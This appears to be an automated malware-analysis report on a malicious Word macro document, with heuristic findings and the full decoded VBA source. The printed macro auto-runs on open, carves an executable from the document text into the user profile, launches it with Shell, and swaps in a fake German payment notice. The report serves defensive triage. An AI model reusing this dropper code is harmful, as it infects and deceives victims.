Verdict: MALICIOUS
Risk Score: 336

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_SHELL. The document body explicitly instructs the user to enable macros, a common lure for malware delivery. The VBA script, named 'macros.bas', contains a call to Shell, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection also confirms its malicious nature as a downloader.
Heuristics (14)

- MSScriptControl.ScriptControl — CVE-2015-0097 (severity: high, CVE likely; rule CVE_2015_0097_SC)
- ClamAV: Doc.Downloader.Generic-6698421-0 (severity: critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (severity: medium, 7 related findings; rule OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (severity: critical; rule OLE_VBA_SHELL). Matched line in script: `LDlYZGUnkPeg = Shell(zIeIPjXJGC)`
- GetObject call (severity: high; rule OLE_VBA_GETOBJ). Matched line in script: `Set pmFaLXI = GetObject(, "word.Application")`
- VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (severity: low; rule OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN). Matched line in script: `Sub Workbook_Open()`
- Auto_Open macro (severity: low; rule OLE_VBA_AUTO). Matched line in script: `Auto_Open`
- Environ() call (env variable access) (severity: low; rule OLE_VBA_ENVIRON). Matched line in script: `THshkdtuZtYx = Environ("USERPROFILE")`
- Legacy WordBasic auto-exec macro marker (severity: medium; rule OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (severity: medium; rule SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5672 bytes |

SHA-256: bcc0b206ca46952c916a37bac34247bc49abc41a914ae3439bdf2b58063b90ea

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E3493C46-4ABA-4218-94ED-A0A546C62FE7}{042040A5-306E-4237-B7CD-10AB5DFFB1E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NewMacros"
Sub NkuDDQXYXQUdKNf(zIeIPjXJGC As String)
Dim THshkdtuZtYx As String
Dim LDlYZGUnkPeg As Integer
THshkdtuZtYx = Environ("USERPROFILE")
ChDrive (THshkdtuZtYx)
ChDir (THshkdtuZtYx)
Debug.Print "The alarm will go off in 10 seconds!"
Debug.Print ("Before OnTime: " & Now)
alertTime = Now + TimeValue("00:10:00")
Application.OnTime alertTime, "EventMacro"
Debug.Print ("After OnTime: " & Now)
LDlYZGUnkPeg = Shell(zIeIPjXJGC)
XzojAPd
End Sub
Sub ddjAEGpLWUs()
Dim tczIDH As Integer
Dim ZrBcrWYELrwPJC As String
Dim NqXCjHetzq As String
Dim GrhxepEK As String
Dim QWrXicvrnpUq As String
NqXCjHetzq = "exe"
QWrXicvrnpUq = "hgZWJKrXclYjI"
ZrBcrWYELrwPJC = "."
GrhxepEK = QWrXicvrnpUq + ZrBcrWYELrwPJC + NqXCjHetzq
tczIDH = FreeFile()
Open GrhxepEK For Binary As tczIDH
End Sub
Sub XzojAPd()
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Dim RtJEfM As Word.Document
Set RtJEfM = ThisDocument
RtJEfM.Range.InsertParagraphAfter
RtJEfM.Range.InsertAfter "Datei Nr. : 51123944" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Zu bezahlen: 575,82 EUR" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Bezahlt: 0,00 EURRest: 575,82 EUR" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Rente (Datei Nr. : 51123944" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Zu bezahlen: 575,82 EUR" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Bezahlt: 0,00 EURRest: 575,82 EUR" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Rente (berechnet bis 28052014): 326,73 EUR" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
RtJEfM.Range.InsertAfter "Kosten: 162,46 EURZu bezahlen (totale balans) 1 065,01 EUR" + vbLf
RtJEfM.Range.InsertAfter "" + vbLf
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub ptRXFNB()
Dim LDlYZGUnkPeg As Integer
Dim QWrXicvrnpUq As String
Dim DclpalrneWCTBK As Long
Dim THshkdtuZtYx As String
Dim nyNjCTwwjJ As String
Dim APHkRGqfO As Boolean
Dim fgEMiBCt As String
Dim NqXCjHetzq As String
Dim SOixezmlmFJnWsR As Integer
Dim tczIDH As Integer
Dim VTwoEc As Byte
Dim GrhxepEK As String
Dim jwSdPvvINqtzjee As Paragraph
nyNjCTwwjJ = "XsTSveotalxVWX"
QWrXicvrnpUq = "hgZWJKrXclYjI"
ZrBcrWYELrwPJC = "."
NqXCjHetzq = "exe"
GrhxepEK = QWrXicvrnpUq + ZrBcrWYELrwPJC + NqXCjHetzq
THshkdtuZtYx = Environ("USERPROFILE")
ChDrive (THshkdtuZtYx)
ChDir (THshkdtuZtYx)
tczIDH = FreeFile()
ddjAEGpLWUs
Debug.Print "The alarm will go off in 10 seconds!"
Debug.Print ("Before OnTime: " & Now)
alertTime = Now + TimeValue("00:10:00")
Application.OnTime alertTime, "EventMacro"
Debug.Print ("After OnTime: " & Now)
Dim BsPjfJMUB As String
Dim vDxWPv As ScriptControl
Dim YhNIZoY As String
Dim MvnnjGrEMWDFz As String
Dim fCpaaS As String
Dim tAbZYllpSvYzV As Document
Set vDxWPv = UserForm1.ScriptControl1
vDxWPv.Language = "VBScript"
MvnnjGrEMWDFz = "ActiveDocument."
YhNIZoY = "Paragraphs"
BsPjfJMUB = MvnnjGrEMWDFz + YhNIZoY
Set pmFaLXI = GetObject(, "word.Application")
On Error GoTo MkrFJHufps
vDxWPv.AddObject "Obj", pmFaLXI
MkrFJHufps:
For Each jwSdPvvINqtzjee In vDxWPv.Eval("Obj." & BsPjfJMUB)
vAgjDRsWKXmbsJ (jwSdPvvINqtzjee)
fgEMiBCt = jwSdPvvINqtzjee.Range.Text
Debug.Print "The alarm will go off in 10 seconds!"
Debug.Print ("Before OnTime: " & Now)
alertTime = Now + TimeValue("00:10:00")
Application.OnTime alertTime, "EventMacro"
Debug.Print ("After OnTime: " & Now)
If (APHkRGqfO = True) Then
DclpalrneWCTBK = 1
Dim rvrSUoruBGPPl As Integer
rvrSUoruBGPPl = 4
While (DclpalrneWCTBK < Len(fgEMiBCt))
VTwoEc = Mid(fgEMiBCt, DclpalrneWCTBK, rvrSUoruBGPPl)
Debug.Print ("After OnTime: " & Now)
Put #tczIDH, , VTwoEc
DclpalrneWCTBK = DclpalrneWCTBK + rvrSUoruBGPPl
Wend
ElseIf (InStr(1, fgEMiBCt, nyNjCTwwjJ) > 0 And Len(fgEMiBCt) > 0) Then
Dim WaTACfFRyows As Boolean
WaTACfFRyows = True
APHkRGqfO = WaTACfFRyows
End If
Next
Close #tczIDH
NkuDDQXYXQUdKNf (GrhxepEK)
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub Auto_Open()
ptRXFNB
End Sub
Sub vAgjDRsWKXmbsJ(CTOzPgPotzBqTmo)
DoEvents
End Sub
```